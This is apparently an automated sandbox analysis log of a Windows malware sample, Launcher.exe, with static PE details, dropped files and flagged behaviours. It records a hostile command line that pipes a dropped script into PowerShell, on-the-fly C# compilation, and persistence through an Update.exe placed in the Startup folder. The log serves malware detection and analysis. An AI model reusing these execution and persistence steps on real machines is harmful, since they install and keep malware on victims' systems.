        Source: Launcher.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: Launcher.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: Launcher.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: D:\a\dpapi\dpapi\build\Release\dpapi.pdb source: Launcher.exe, 00000000.00000003.1498567944.0000017526712000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1515067184.0000017526090000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: D:\a\node-sqlite3\node-sqlite3\build\Release\node_sqlite3.pdb source: Launcher.exe, 00000000.00000003.1476689019.000001752696F000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1338150455.000001752651D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1440142537.00000175283C9000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1336270398.000001752650D000.00000004.00000020.00020000.00000000.sdmp
        Source: Launcher.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
        Source: Launcher.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
        Source: Launcher.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
        Source: Launcher.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
        Source: Launcher.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

        Data Obfuscation

        barindex
        Suspicious command line found
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\system32\cmd.exe /d /s /c "type C:\Users\user\AppData\Roaming\temp.ps1 | powershell.exe -noprofile -"
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\system32\cmd.exe /d /s /c "type C:\Users\user\AppData\Roaming\temp.ps1 | powershell.exe -noprofile -"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\anq2mtqn\anq2mtqn.cmdline"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\anq2mtqn\anq2mtqn.cmdline"Jump to behavior
        Source: Launcher.exeStatic PE information: section name: _RDATA
        Source: Update.exe.0.drStatic PE information: section name: _RDATA
        Source: b9a7b76665d92af2d90cc6a15ffdc1a79635559cbc1c40bd1f83c4c4449cd442.0.drStatic PE information: section name: _RDATA
        Source: node_sqlite3.node.0.drStatic PE information: section name: _RDATA
        Source: node_sqlite3.node.bak.0.drStatic PE information: section name: _RDATA
        Source: 59b07c111ff3cdb6a2d6d93c23513b9ec89195f53f0a55a3a7769a9f164e6041.0.drStatic PE information: section name: _RDATA
        Source: node.napi.node.0.drStatic PE information: section name: _RDATA
        Source: node.napi.node.bak.0.drStatic PE information: section name: _RDATA
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFC9FC4692C push eax; retf 22_2_00007FFC9FC4692D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFC9FC38128 push ebx; ret 22_2_00007FFC9FC3813A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFC9FEA46DC push ds; retf 22_2_00007FFC9FEA474F
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFC9FEA7BD4 push esi; ret 22_2_00007FFC9FEA7BD7
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA011FAC0 push eax; ret 22_2_00007FFCA011FAC1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA011FB39 push eax; ret 22_2_00007FFCA011FB3A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA011D750 push edi; iretd 22_2_00007FFCA01255E6
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA025CD60 push esp; retf 22_2_00007FFCA025CD61
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA025D2E4 push eax; retf 22_2_00007FFCA025D2E5
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFCA03BC864 push ds; iretd 22_2_00007FFCA03BC867
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FC2EF6E pushad ; retf 678Bh26_2_00007FFC9FC2F6E7
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FC26178 push eax; retn FC9Fh26_2_00007FFC9FC262CB
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FC2EB84 push eax; retf 26_2_00007FFC9FC2EB85
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FE81730 push eax; retf 26_2_00007FFC9FE81731
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFEA2BD pushad ; retf 26_2_00007FFC9FFEAD49
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFF55DB push esi; iretd 26_2_00007FFC9FFF55E7
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFCA03958D5 push ss; ret 26_2_00007FFCA03958E1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFCA0396244 push es; retf 26_2_00007FFCA0396247
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFCA0390E0C pushad ; ret 26_2_00007FFCA0390E24
        Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node.bakJump to dropped file
        Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Local\Temp\pkg\0de74a34d95a30eed84cdf31f0dc5868c59b7977d3d496845c9363812235b768\@primno\dpapi\prebuilds\win32-x64\node.napi.node.bakJump to dropped file
        Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Local\Temp\pkg-RIXWqQ\59b07c111ff3cdb6a2d6d93c23513b9ec89195f53f0a55a3a7769a9f164e6041Jump to dropped file
        Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.exeJump to dropped file
        Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Local\Temp\pkg-RIXWqQ\b9a7b76665d92af2d90cc6a15ffdc1a79635559cbc1c40bd1f83c4c4449cd442Jump to dropped file
        Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.nodeJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\anq2mtqn\anq2mtqn.dllJump to dropped file
        Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Local\Temp\pkg\0de74a34d95a30eed84cdf31f0dc5868c59b7977d3d496845c9363812235b768\@primno\dpapi\prebuilds\win32-x64\node.napi.nodeJump to dropped file
        Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Local\Temp\pkg-RIXWqQ\b9a7b76665d92af2d90cc6a15ffdc1a79635559cbc1c40bd1f83c4c4449cd442Jump to dropped file
        Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.nodeJump to dropped file
        Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node.bakJump to dropped file
        Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Local\Temp\pkg-RIXWqQ\59b07c111ff3cdb6a2d6d93c23513b9ec89195f53f0a55a3a7769a9f164e6041Jump to dropped file
        Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Local\Temp\pkg\0de74a34d95a30eed84cdf31f0dc5868c59b7977d3d496845c9363812235b768\@primno\dpapi\prebuilds\win32-x64\node.napi.nodeJump to dropped file
        Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Local\Temp\pkg\0de74a34d95a30eed84cdf31f0dc5868c59b7977d3d496845c9363812235b768\@primno\dpapi\prebuilds\win32-x64\node.napi.node.bakJump to dropped file

        Boot Survival

        barindex
        Drops PE files to the startup folder
        Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.exeJump to dropped file
        Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.exeJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.exeJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.exe\:Zone.Identifier:$DATAJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
